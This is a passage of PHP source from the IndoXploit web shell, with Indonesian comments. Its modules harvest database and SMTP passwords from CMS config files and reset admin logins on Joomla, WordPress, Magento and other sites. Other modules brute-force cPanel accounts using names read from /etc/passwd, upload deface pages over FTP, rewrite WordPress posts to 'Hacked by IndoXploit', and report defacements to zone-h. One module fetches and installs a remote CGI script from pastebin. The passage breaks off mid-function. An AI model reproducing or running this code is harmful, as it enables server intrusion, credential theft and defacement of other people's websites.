  755. if($user_jumping_url == $user_idx_jump) {
  756. echo " => ( <u>$dj</u> )<br>";
  757. break;
  758. }
  759. }
  760. }
  761. } else {
  762. echo "<br>";
  763. }
  764. }
  765. }
  766. }
  767. }
  768. if($i == 0) {
  769. } else {
  770. echo "<br>Total ada ".$i." lonte di ".$ip;
  771. }
  772. echo "</pre>";
  773. }
  774. echo "</div>";
  775. } elseif($_GET['do'] == 'auto_edit_user') {
  776. if($_POST['hajar']) {
  777. if(strlen($_POST['pass_baru']) < 6 OR strlen($_POST['user_baru']) < 6) {
  778. echo "username atau password harus lebih dari 6 karakter";
  779. } else {
  780. $user_baru = $_POST['user_baru'];
  781. $pass_baru = md5($_POST['pass_baru']);
  782. $conf = $_POST['config_dir'];
  783. $scan_conf = scandir($conf);
  784. foreach($scan_conf as $file_conf) {
  785. if(!is_file("$conf/$file_conf")) continue;
  786. $config = file_get_contents("$conf/$file_conf");
  787. if(preg_match("/JConfig|joomla/",$config)) {
  788. $dbhost = ambilkata($config,"host = '","'");
  789. $dbuser = ambilkata($config,"user = '","'");
  790. $dbpass = ambilkata($config,"password = '","'");
  791. $dbname = ambilkata($config,"db = '","'");
  792. $dbprefix = ambilkata($config,"dbprefix = '","'");
  793. $prefix = $dbprefix."users";
  794. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  795. $db = mysql_select_db($dbname);
  796. $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  797. $result = mysql_fetch_array($q);
  798. $id = $result['id'];
  799. $site = ambilkata($config,"sitename = '","'");
  800. $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE id='$id'");
  801. echo "Config => ".$file_conf."<br>";
  802. echo "CMS => Joomla<br>";
  803. if($site == '') {
  804. echo "Sitename => <font color=red>error, gabisa ambil nama domain nya</font><br>";
  805. } else {
  806. echo "Sitename => $site<br>";
  807. }
  808. if(!$update OR !$conn OR !$db) {
  809. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  810. } else {
  811. echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  812. }
  813. mysql_close($conn);
  814. } elseif(preg_match("/WordPress/",$config)) {
  815. $dbhost = ambilkata($config,"DB_HOST', '","'");
  816. $dbuser = ambilkata($config,"DB_USER', '","'");
  817. $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
  818. $dbname = ambilkata($config,"DB_NAME', '","'");
  819. $dbprefix = ambilkata($config,"table_prefix = '","'");
  820. $prefix = $dbprefix."users";
  821. $option = $dbprefix."options";
  822. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  823. $db = mysql_select_db($dbname);
  824. $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  825. $result = mysql_fetch_array($q);
  826. $id = $result[ID];
  827. $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
  828. $result2 = mysql_fetch_array($q2);
  829. $target = $result2[option_value];
  830. if($target == '') {
  831. $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  832. } else {
  833. $url_target = "Login => <a href='$target/wp-login.php' target='_blank'><u>$target/wp-login.php</u></a><br>";
  834. }
  835. $update = mysql_query("UPDATE $prefix SET user_login='$user_baru',user_pass='$pass_baru' WHERE id='$id'");
  836. echo "Config => ".$file_conf."<br>";
  837. echo "CMS => Wordpress<br>";
  838. echo $url_target;
  839. if(!$update OR !$conn OR !$db) {
  840. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  841. } else {
  842. echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  843. }
  844. mysql_close($conn);
  845. } elseif(preg_match("/Magento|Mage_Core/",$config)) {
  846. $dbhost = ambilkata($config,"<host><![CDATA[","]]></host>");
  847. $dbuser = ambilkata($config,"<username><![CDATA[","]]></username>");
  848. $dbpass = ambilkata($config,"<password><![CDATA[","]]></password>");
  849. $dbname = ambilkata($config,"<dbname><![CDATA[","]]></dbname>");
  850. $dbprefix = ambilkata($config,"<table_prefix><![CDATA[","]]></table_prefix>");
  851. $prefix = $dbprefix."admin_user";
  852. $option = $dbprefix."core_config_data";
  853. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  854. $db = mysql_select_db($dbname);
  855. $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
  856. $result = mysql_fetch_array($q);
  857. $id = $result[user_id];
  858. $q2 = mysql_query("SELECT * FROM $option WHERE path='web/secure/base_url'");
  859. $result2 = mysql_fetch_array($q2);
  860. $target = $result2[value];
  861. if($target == '') {
  862. $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  863. } else {
  864. $url_target = "Login => <a href='$target/admin/' target='_blank'><u>$target/admin/</u></a><br>";
  865. }
  866. $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'");
  867. echo "Config => ".$file_conf."<br>";
  868. echo "CMS => Magento<br>";
  869. echo $url_target;
  870. if(!$update OR !$conn OR !$db) {
  871. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  872. } else {
  873. echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  874. }
  875. mysql_close($conn);
  876. } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/",$config)) {
  877. $dbhost = ambilkata($config,"'DB_HOSTNAME', '","'");
  878. $dbuser = ambilkata($config,"'DB_USERNAME', '","'");
  879. $dbpass = ambilkata($config,"'DB_PASSWORD', '","'");
  880. $dbname = ambilkata($config,"'DB_DATABASE', '","'");
  881. $dbprefix = ambilkata($config,"'DB_PREFIX', '","'");
  882. $prefix = $dbprefix."user";
  883. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  884. $db = mysql_select_db($dbname);
  885. $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
  886. $result = mysql_fetch_array($q);
  887. $id = $result[user_id];
  888. $target = ambilkata($config,"HTTP_SERVER', '","'");
  889. if($target == '') {
  890. $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  891. } else {
  892. $url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a><br>";
  893. }
  894. $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'");
  895. echo "Config => ".$file_conf."<br>";
  896. echo "CMS => OpenCart<br>";
  897. echo $url_target;
  898. if(!$update OR !$conn OR !$db) {
  899. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  900. } else {
  901. echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  902. }
  903. mysql_close($conn);
  904. } elseif(preg_match("/panggil fungsi validasi xss dan injection/",$config)) {
  905. $dbhost = ambilkata($config,'server = "','"');
  906. $dbuser = ambilkata($config,'username = "','"');
  907. $dbpass = ambilkata($config,'password = "','"');
  908. $dbname = ambilkata($config,'database = "','"');
  909. $prefix = "users";
  910. $option = "identitas";
  911. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  912. $db = mysql_select_db($dbname);
  913. $q = mysql_query("SELECT * FROM $option ORDER BY id_identitas ASC");
  914. $result = mysql_fetch_array($q);
  915. $target = $result[alamat_website];
  916. if($target == '') {
  917. $target2 = $result[url];
  918. $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  919. if($target2 == '') {
  920. $url_target2 = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  921. } else {
  922. $cek_login3 = file_get_contents("$target2/adminweb/");
  923. $cek_login4 = file_get_contents("$target2/lokomedia/adminweb/");
  924. if(preg_match("/CMS Lokomedia|Administrator/", $cek_login3)) {
  925. $url_target2 = "Login => <a href='$target2/adminweb' target='_blank'><u>$target2/adminweb</u></a><br>";
  926. } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login4)) {
  927. $url_target2 = "Login => <a href='$target2/lokomedia/adminweb' target='_blank'><u>$target2/lokomedia/adminweb</u></a><br>";
  928. } else {
  929. $url_target2 = "Login => <a href='$target2' target='_blank'><u>$target2</u></a> [ <font color=red>kaga tau admin login nya njeng!!!</font> ]<br>";
  930. }
  931. }
  932. } else {
  933. $cek_login = file_get_contents("$target/adminweb/");
  934. $cek_login2 = file_get_contents("$target/lokomedia/adminweb/");
  935. if(preg_match("/CMS Lokomedia|Administrator/", $cek_login)) {
  936. $url_target = "Login => <a href='$target/adminweb' target='_blank'><u>$target/adminweb</u></a><br>";
  937. } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login2)) {
  938. $url_target = "Login => <a href='$target/lokomedia/adminweb' target='_blank'><u>$target/lokomedia/adminweb</u></a><br>";
  939. } else {
  940. $url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>";
  941. }
  942. }
  943. $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE level='admin'");
  944. echo "Config => ".$file_conf."<br>";
  945. echo "CMS => Lokomedia<br>";
  946. if(preg_match('/error, gabisa ambil nama domain nya/', $url_target)) {
  947. echo $url_target2;
  948. } else {
  949. echo $url_target;
  950. }
  951. if(!$update OR !$conn OR !$db) {
  952. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  953. } else {
  954. echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  955. }
  956. mysql_close($conn);
  957. }
  958. }
  959. }
  960. } else {
  961. echo "<center>
  962. <h1>Auto Edit User Config</h1>
  963. <form method='post'>
  964. DIR Config: <br>
  965. <input type='text' size='50' name='config_dir' value='$dir'><br><br>
  966. Set User & Pass: <br>
  967. <input type='text' name='user_baru' value='indoxploit' placeholder='user_baru'><br>
  968. <input type='text' name='pass_baru' value='indoxploit' placeholder='pass_baru'><br>
  969. <input type='submit' name='hajar' value='Hajar!' style='width: 215px;'>
  970. </form>
  971. <span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br>
  972. ";
  973. }
  974. } elseif($_GET['do'] == 'cpanel') {
  975. if($_POST['crack']) {
  976. $usercp = explode("\r\n", $_POST['user_cp']);
  977. $passcp = explode("\r\n", $_POST['pass_cp']);
  978. $i = 0;
  979. foreach($usercp as $ucp) {
  980. foreach($passcp as $pcp) {
  981. if(@mysql_connect('localhost', $ucp, $pcp)) {
  982. if($_SESSION[$ucp] && $_SESSION[$pcp]) {
  983. } else {
  984. $_SESSION[$ucp] = "1";
  985. $_SESSION[$pcp] = "1";
  986. if($ucp == '' || $pcp == '') {
  987.  
  988. } else {
  989. $i++;
  990. if(function_exists('posix_getpwuid')) {
  991. $domain_cp = file_get_contents("/etc/named.conf");
  992. if($domain_cp == '') {
  993. $dom = "<font color=red>gabisa ambil nama domain nya</font>";
  994. } else {
  995. preg_match_all("#/var/named/(.*?).db#", $domain_cp, $domains_cp);
  996. foreach($domains_cp[1] as $dj) {
  997. $user_cp_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
  998. $user_cp_url = $user_cp_url['name'];
  999. if($user_cp_url == $ucp) {
  1000. $dom = "<a href='http://$dj/' target='_blank'><font color=lime>$dj</font></a>";
  1001. break;
  1002. }
  1003. }
  1004. }
  1005. } else {
  1006. $dom = "<font color=red>function is Disable by system</font>";
  1007. }
  1008. echo "username (<font color=lime>$ucp</font>) password (<font color=lime>$pcp</font>) domain ($dom)<br>";
  1009. }
  1010. }
  1011. }
  1012. }
  1013. }
  1014. if($i == 0) {
  1015. } else {
  1016. echo "<br>sukses nyolong ".$i." lonte by <font color=lime>cowo gans!.</font>";
  1017. }
  1018. } else {
  1019. echo "<center>
  1020. <form method='post'>
  1021. USER: <br>
  1022. <textarea style='width: 450px; height: 150px;' name='user_cp'>";
  1023. $_usercp = fopen("/etc/passwd","r");
  1024. while($getu = fgets($_usercp)) {
  1025. if($getu == '' || !$_usercp) {
  1026. echo "<font color=red>Can't read /etc/passwd</font>";
  1027. } else {
  1028. preg_match_all("/(.*?):x:/", $getu, $u);
  1029. foreach($u[1] as $user_cp) {
  1030. if(is_dir("/home/$user_cp/public_html")) {
  1031. echo "$user_cp\n";
  1032. }
  1033. }
  1034. }
  1035. }
  1036. echo "</textarea><br>
  1037. PASS: <br>
  1038. <textarea style='width: 450px; height: 200px;' name='pass_cp'>";
  1039. function cp_pass($dir) {
  1040. $pass = "";
  1041. $dira = scandir($dir);
  1042. foreach($dira as $dirb) {
  1043. if(!is_file("$dir/$dirb")) continue;
  1044. $ambil = file_get_contents("$dir/$dirb");
  1045. if(preg_match("/WordPress/", $ambil)) {
  1046. $pass .= ambilkata($ambil,"DB_PASSWORD', '","'")."\n";
  1047. } elseif(preg_match("/JConfig|joomla/", $ambil)) {
  1048. $pass .= ambilkata($ambil,"password = '","'")."\n";
  1049. } elseif(preg_match("/Magento|Mage_Core/", $ambil)) {
  1050. $pass .= ambilkata($ambil,"<password><![CDATA[","]]></password>")."\n";
  1051. } elseif(preg_match("/panggil fungsi validasi xss dan injection/", $ambil)) {
  1052. $pass .= ambilkata($ambil,'password = "','"')."\n";
  1053. } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/", $ambil)) {
  1054. $pass .= ambilkata($ambil,"'DB_PASSWORD', '","'")."\n";
  1055. } elseif(preg_match("/^[client]$/", $ambil)) {
  1056. preg_match("/password=(.*?)/", $ambil, $pass1);
  1057. if(preg_match('/"/', $pass1[1])) {
  1058. $pass1[1] = str_replace('"', "", $pass1[1]);
  1059. $pass .= $pass1[1]."\n";
  1060. } else {
  1061. $pass .= $pass1[1]."\n";
  1062. }
  1063. } elseif(preg_match("/cc_encryption_hash/", $ambil)) {
  1064. $pass .= ambilkata($ambil,"db_password = '","'")."\n";
  1065. }
  1066. }
  1067. echo $pass;
  1068. }
  1069. $cp_pass = cp_pass($dir);
  1070. echo $cp_pass;
  1071. echo "</textarea><br>
  1072. <input type='submit' name='crack' style='width: 450px;' value='Crack'>
  1073. </form>
  1074. <span>NB: CPanel Crack ini sudah auto get password ( pake db password ) maka akan work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br></center>";
  1075. }
  1076. } elseif($_GET['do'] == 'cpftp_auto') {
  1077. if($_POST['crack']) {
  1078. $usercp = explode("\r\n", $_POST['user_cp']);
  1079. $passcp = explode("\r\n", $_POST['pass_cp']);
  1080. $i = 0;
  1081. foreach($usercp as $ucp) {
  1082. foreach($passcp as $pcp) {
  1083. if(@mysql_connect('localhost', $ucp, $pcp)) {
  1084. if($_SESSION[$ucp] && $_SESSION[$pcp]) {
  1085. } else {
  1086. $_SESSION[$ucp] = "1";
  1087. $_SESSION[$pcp] = "1";
  1088. if($ucp == '' || $pcp == '') {
  1089. //
  1090. } else {
  1091. echo "[+] username (<font color=lime>$ucp</font>) password (<font color=lime>$pcp</font>)<br>";
  1092. $ftp_conn = ftp_connect($ip);
  1093. $ftp_login = ftp_login($ftp_conn, $ucp, $pcp);
  1094. if((!$ftp_login) || (!$ftp_conn)) {
  1095. echo "[+] <font color=red>Login Gagal</font><br><br>";
  1096. } else {
  1097. echo "[+] <font color=lime>Login Sukses</font><br>";
  1098. $fi = htmlspecialchars($_POST['file_deface']);
  1099. $deface = ftp_put($ftp_conn, "public_html/$fi", $_POST['deface'], FTP_BINARY);
  1100. if($deface) {
  1101. $i++;
  1102. echo "[+] <font color=lime>Deface Sukses</font><br>";
  1103. if(function_exists('posix_getpwuid')) {
  1104. $domain_cp = file_get_contents("/etc/named.conf");
  1105. if($domain_cp == '') {
  1106. echo "[+] <font color=red>gabisa ambil nama domain nya</font><br><br>";
  1107. } else {
  1108. preg_match_all("#/var/named/(.*?).db#", $domain_cp, $domains_cp);
  1109. foreach($domains_cp[1] as $dj) {
  1110. $user_cp_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
  1111. $user_cp_url = $user_cp_url['name'];
  1112. if($user_cp_url == $ucp) {
  1113. echo "[+] <a href='http://$dj/$fi' target='_blank'>http://$dj/$fi</a><br><br>";
  1114. break;
  1115. }
  1116. }
  1117. }
  1118. } else {
  1119. echo "[+] <font color=red>gabisa ambil nama domain nya</font><br><br>";
  1120. }
  1121. } else {
  1122. echo "[-] <font color=red>Deface Gagal</font><br><br>";
  1123. }
  1124. }
  1125. //echo "username (<font color=lime>$ucp</font>) password (<font color=lime>$pcp</font>)<br>";
  1126. }
  1127. }
  1128. }
  1129. }
  1130. }
  1131. if($i == 0) {
  1132. } else {
  1133. echo "<br>sukses deface ".$i." Cpanel by <font color=lime>gw gans.</font>";
  1134. }
  1135. } else {
  1136. echo "<center>
  1137. <form method='post'>
  1138. Filename: <br>
  1139. <input type='text' name='file_deface' placeholder='index.php' value='index.php' style='width: 450px;'><br>
  1140. Deface Page: <br>
  1141. <input type='text' name='deface' placeholder='http://www.web-yang-udah-di-deface.com/filemu.php' style='width: 450px;'><br>
  1142. USER: <br>
  1143. <textarea style='width: 450px; height: 150px;' name='user_cp'>";
  1144. $_usercp = fopen("/etc/passwd","r");
  1145. while($getu = fgets($_usercp)) {
  1146. if($getu == '' || !$_usercp) {
  1147. echo "<font color=red>Can't read /etc/passwd</font>";
  1148. } else {
  1149. preg_match_all("/(.*?):x:/", $getu, $u);
  1150. foreach($u[1] as $user_cp) {
  1151. if(is_dir("/home/$user_cp/public_html")) {
  1152. echo "$user_cp\n";
  1153. }
  1154. }
  1155. }
  1156. }
  1157. echo "</textarea><br>
  1158. PASS: <br>
  1159. <textarea style='width: 450px; height: 200px;' name='pass_cp'>";
  1160. function cp_pass($dir) {
  1161. $pass = "";
  1162. $dira = scandir($dir);
  1163. foreach($dira as $dirb) {
  1164. if(!is_file("$dir/$dirb")) continue;
  1165. $ambil = file_get_contents("$dir/$dirb");
  1166. if(preg_match("/WordPress/", $ambil)) {
  1167. $pass .= ambilkata($ambil,"DB_PASSWORD', '","'")."\n";
  1168. } elseif(preg_match("/JConfig|joomla/", $ambil)) {
  1169. $pass .= ambilkata($ambil,"password = '","'")."\n";
  1170. } elseif(preg_match("/Magento|Mage_Core/", $ambil)) {
  1171. $pass .= ambilkata($ambil,"<password><![CDATA[","]]></password>")."\n";
  1172. } elseif(preg_match("/panggil fungsi validasi xss dan injection/", $ambil)) {
  1173. $pass .= ambilkata($ambil,'password = "','"')."\n";
  1174. } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/", $ambil)) {
  1175. $pass .= ambilkata($ambil,"'DB_PASSWORD', '","'")."\n";
  1176. } elseif(preg_match("/client/", $ambil)) {
  1177. preg_match("/password=(.*)/", $ambil, $pass1);
  1178. if(preg_match('/"/', $pass1[1])) {
  1179. $pass1[1] = str_replace('"', "", $pass1[1]);
  1180. $pass .= $pass1[1]."\n";
  1181. }
  1182. } elseif(preg_match("/cc_encryption_hash/", $ambil)) {
  1183. $pass .= ambilkata($ambil,"db_password = '","'")."\n";
  1184. }
  1185. }
  1186. echo $pass;
  1187. }
  1188. $cp_pass = cp_pass($dir);
  1189. echo $cp_pass;
  1190. echo "</textarea><br>
  1191. <input type='submit' name='crack' style='width: 450px;' value='Hajar'>
  1192. </form>
  1193. <span>NB: CPanel Crack ini sudah auto get password ( pake db password ) maka akan work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br></center>";
  1194. }
  1195. } elseif($_GET['do'] == 'smtp') {
  1196. echo "<center><span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span></center><br>";
  1197. function scj($dir) {
  1198. $dira = scandir($dir);
  1199. foreach($dira as $dirb) {
  1200. if(!is_file("$dir/$dirb")) continue;
  1201. $ambil = file_get_contents("$dir/$dirb");
  1202. $ambil = str_replace("$", "", $ambil);
  1203. if(preg_match("/JConfig|joomla/", $ambil)) {
  1204. $smtp_host = ambilkata($ambil,"smtphost = '","'");
  1205. $smtp_auth = ambilkata($ambil,"smtpauth = '","'");
  1206. $smtp_user = ambilkata($ambil,"smtpuser = '","'");
  1207. $smtp_pass = ambilkata($ambil,"smtppass = '","'");
  1208. $smtp_port = ambilkata($ambil,"smtpport = '","'");
  1209. $smtp_secure = ambilkata($ambil,"smtpsecure = '","'");
  1210. echo "SMTP Host: <font color=lime>$smtp_host</font><br>";
  1211. echo "SMTP port: <font color=lime>$smtp_port</font><br>";
  1212. echo "SMTP user: <font color=lime>$smtp_user</font><br>";
  1213. echo "SMTP pass: <font color=lime>$smtp_pass</font><br>";
  1214. echo "SMTP auth: <font color=lime>$smtp_auth</font><br>";
  1215. echo "SMTP secure: <font color=lime>$smtp_secure</font><br><br>";
  1216. }
  1217. }
  1218. }
  1219. $smpt_hunter = scj($dir);
  1220. echo $smpt_hunter;
  1221. } elseif($_GET['do'] == 'auto_wp') {
  1222. if($_POST['hajar']) {
  1223. $title = htmlspecialchars($_POST['new_title']);
  1224. $pn_title = str_replace(" ", "-", $title);
  1225. if($_POST['cek_edit'] == "Y") {
  1226. $script = $_POST['edit_content'];
  1227. } else {
  1228. $script = $title;
  1229. }
  1230. $conf = $_POST['config_dir'];
  1231. $scan_conf = scandir($conf);
  1232. foreach($scan_conf as $file_conf) {
  1233. if(!is_file("$conf/$file_conf")) continue;
  1234. $config = file_get_contents("$conf/$file_conf");
  1235. if(preg_match("/WordPress/", $config)) {
  1236. $dbhost = ambilkata($config,"DB_HOST', '","'");
  1237. $dbuser = ambilkata($config,"DB_USER', '","'");
  1238. $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
  1239. $dbname = ambilkata($config,"DB_NAME', '","'");
  1240. $dbprefix = ambilkata($config,"table_prefix = '","'");
  1241. $prefix = $dbprefix."posts";
  1242. $option = $dbprefix."options";
  1243. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  1244. $db = mysql_select_db($dbname);
  1245. $q = mysql_query("SELECT * FROM $prefix ORDER BY ID ASC");
  1246. $result = mysql_fetch_array($q);
  1247. $id = $result[ID];
  1248. $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
  1249. $result2 = mysql_fetch_array($q2);
  1250. $target = $result2[option_value];
  1251. $update = mysql_query("UPDATE $prefix SET post_title='$title',post_content='$script',post_name='$pn_title',post_status='publish',comment_status='open',ping_status='open',post_type='post',comment_count='1' WHERE id='$id'");
  1252. $update .= mysql_query("UPDATE $option SET option_value='$title' WHERE option_name='blogname' OR option_name='blogdescription'");
  1253. echo "<div style='margin: 5px auto;'>";
  1254. if($target == '') {
  1255. echo "URL: <font color=red>error, gabisa ambil nama domain nya</font> -> ";
  1256. } else {
  1257. echo "URL: <a href='$target/?p=$id' target='_blank'>$target/?p=$id</a> -> ";
  1258. }
  1259. if(!$update OR !$conn OR !$db) {
  1260. echo "<font color=red>MySQL Error: ".mysql_error()."</font><br>";
  1261. } else {
  1262. echo "<font color=lime>sukses di ganti.</font><br>";
  1263. }
  1264. echo "</div>";
  1265. mysql_close($conn);
  1266. }
  1267. }
  1268. } else {
  1269. echo "<center>
  1270. <h1>Auto Edit Title+Content WordPress</h1>
  1271. <form method='post'>
  1272. DIR Config: <br>
  1273. <input type='text' size='50' name='config_dir' value='$dir'><br><br>
  1274. Set Title: <br>
  1275. <input type='text' name='new_title' value='Hacked by IndoXploit' placeholder='New Title'><br><br>
  1276. Edit Content?: <input type='radio' name='cek_edit' value='Y' checked>Y<input type='radio' name='cek_edit' value='N'>N<br>
  1277. <span>Jika pilih <u>Y</u> masukin script defacemu ( saran yang simple aja ), kalo pilih <u>N</u> gausah di isi.</span><br>
  1278. <textarea name='edit_content' placeholder='contoh script: http://pastebin.com/EpP671gK' style='width: 450px; height: 150px;'></textarea><br>
  1279. <input type='submit' name='hajar' value='Hajar!' style='width: 450px;'><br>
  1280. </form>
  1281. <span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br>
  1282. ";
  1283. }
  1284. } elseif($_GET['do'] == 'zoneh') {
  1285. if($_POST['submit']) {
  1286. $domain = explode("\r\n", $_POST['url']);
  1287. $nick = $_POST['nick'];
  1288. echo "Defacer Onhold: <a href='http://www.zone-h.org/archive/notifier=$nick/published=0' target='_blank'>http://www.zone-h.org/archive/notifier=$nick/published=0</a><br>";
  1289. echo "Defacer Archive: <a href='http://www.zone-h.org/archive/notifier=$nick' target='_blank'>http://www.zone-h.org/archive/notifier=$nick</a><br><br>";
  1290. function zoneh($url,$nick) {
  1291. $ch = curl_init("http://www.zone-h.com/notify/single");
  1292. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  1293. curl_setopt($ch, CURLOPT_POST, true);
  1294. curl_setopt($ch, CURLOPT_POSTFIELDS, "defacer=$nick&domain1=$url&hackmode=1&reason=1&submit=Send");
  1295. return curl_exec($ch);
  1296. curl_close($ch);
  1297. }
  1298. foreach($domain as $url) {
  1299. $zoneh = zoneh($url,$nick);
  1300. if(preg_match("/color=\"red\">OK<\/font><\/li>/i", $zoneh)) {
  1301. echo "$url -> <font color=lime>OK</font><br>";
  1302. } else {
  1303. echo "$url -> <font color=red>ERROR</font><br>";
  1304. }
  1305. }
  1306. } else {
  1307. echo "<center><form method='post'>
  1308. <u>Defacer</u>: <br>
  1309. <input type='text' name='nick' size='50' value='IndoXploit'><br>
  1310. <u>Domains</u>: <br>
  1311. <textarea style='width: 450px; height: 150px;' name='url'></textarea><br>
  1312. <input type='submit' name='submit' value='Submit' style='width: 450px;'>
  1313. </form>";
  1314. }
  1315. echo "</center>";
  1316. } elseif($_GET['do'] == 'cgi') {
  1317. $cgi_dir = mkdir('idx_cgi', 0755);
  1318. $file_cgi = "idx_cgi/cgi.izo";
  1319. $isi_htcgi = "AddHandler cgi-script .izo";
  1320. $htcgi = fopen(".htaccess", "w");
  1321. fwrite($htcgi, $isi_htcgi);
  1322. fclose($htcgi);
  1323. $cgi_script = getsource("http://pastebin.com/raw/Lj46KxFT");
  1324. $cgi = fopen($file_cgi, "w");
  1325. fwrite($cgi, $cgi_script);
  1326. fclose($cgi);
  1327. chmod($file_cgi, 0755);
  1328. echo "<iframe src='idx_cgi/cgi.izo' width='100%' height='100%' frameborder='0' scrolling='no'></iframe>";
  1329. } elseif($_GET['do'] == 'fake_root') {
  1330. ob_start();
  1331. $cwd = getcwd();
  1332. $ambil_user = explode("/", $cwd);
  1333. $user = $ambil_user[2];
  1334. if($_POST['reverse']) {
  1335. $site = explode("\r\n", $_POST['url']);
  1336. $file = $_POST['file'];
  1337. foreach($site as $url) {
  1338. $cek = getsource("$url/~$user/$file");
  1339. if(preg_match("/hacked/i", $cek)) {
  1340. echo "URL: <a href='$url/~$user/$file' target='_blank'>$url/~$user/$file</a> -> <font color=lime>Fake Root!</font><br>";
  1341. }
  1342. }
  1343. } else {
  1344. echo "<center><form method='post'>
  1345. Filename: <br><input type='text' name='file' value='deface.html' size='50' height='10'><br>
  1346. User: <br><input type='text' value='$user' size='50' height='10' readonly><br>
  1347. Domain: <br>
  1348. <textarea style='width: 450px; height: 250px;' name='url'>";
  1349. reverse($_SERVER['HTTP_HOST']);
  1350. echo "</textarea><br>
  1351. <input type='submit' name='reverse' value='Scan Fake Root!' style='width: 450px;'>
  1352. </form><br>
  1353. NB: Sebelum gunain Tools ini , upload dulu file deface kalian di dir /home/user/ dan /home/user/public_html.</center>";
  1354. }
  1355. } elseif($_GET['do'] == 'adminer') {
  1356. $full = str_replace($_SERVER['DOCUMENT_ROOT'], "", $dir);
  1357. function adminer($url, $isi) {
  1358. $fp = fopen($isi, "w");
  1359. $ch = curl_init();
  1360. curl_setopt($ch, CURLOPT_URL, $url);
  1361. curl_setopt($ch, CURLOPT_BINARYTRANSFER, true);
  1362. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  1363. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
  1364. curl_setopt($ch, CURLOPT_FILE, $fp);
  1365. return curl_exec($ch);
  1366. curl_close($ch);
  1367. fclose($fp);
  1368. ob_flush();
  1369. flush();
  1370. }
  1371. if(file_exists('adminer.php')) {
  1372. echo "<center><font color=lime><a href='$full/adminer.php' target='_blank'>-> adminer login <-</a></font></center>";
  1373. } else {
  1374. if(adminer("https://www.adminer.org/static/download/4.2.4/adminer-4.2.4.php","adminer.php")) {
  1375. echo "<center><font color=lime><a href='$full/adminer.php' target='_blank'>-> adminer login <-</a></font></center>";
  1376. } else {
  1377. echo "<center><font color=red>gagal buat file adminer</font></center>";
  1378. }
  1379. }
  1380. } elseif($_GET['do'] == 'auto_dwp') {
  1381. if($_POST['auto_deface_wp']) {
  1382. function anucurl($sites) {
  1383. $ch = curl_init($sites);
  1384. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  1385. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  1386. curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  1387. curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
  1388. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  1389. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  1390. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  1391. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  1392. curl_setopt($ch, CURLOPT_COOKIESESSION, true);
  1393. $data = curl_exec($ch);
  1394. curl_close($ch);
  1395. return $data;
  1396. }
  1397. function lohgin($cek, $web, $userr, $pass, $wp_submit) {
  1398. $post = array(
  1399. "log" => "$userr",
